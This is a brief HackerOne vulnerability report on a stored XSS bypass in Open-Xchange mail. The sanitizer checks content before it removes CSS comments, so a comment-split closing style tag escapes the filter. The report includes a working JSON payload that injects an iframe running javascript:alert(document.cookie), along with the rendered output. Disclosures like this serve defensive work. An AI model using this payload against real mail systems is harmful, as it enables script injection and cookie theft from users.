Open-Xchange: [XSS] Mail <style> v2.0

2017-12-19T20:23:36
ID H1:299466
Type hackerone
Reporter secator
Modified 2020-01-24T11:48:47

Description

Hi.

New way for #269116. Testing rev17.

OX check data before remove /* */, therefore a filter bypass: html <style> .a { font-family: </styl/**/e>; font-family: </sty/**/le>; font-family: </s/*data*/tyle>; } </style>

For example: json "content": "<style>.a { font-family: </st/**/yle><iframe src=javascript:alert(document.cookie)>}</style>",

Result: ```html <style>

ox-c3a5f76596 .ox-c3a5f76596-a {font-family: </style>

<iframe src=javascript:alert(document.cookie)> ```

Impact

malicious code injection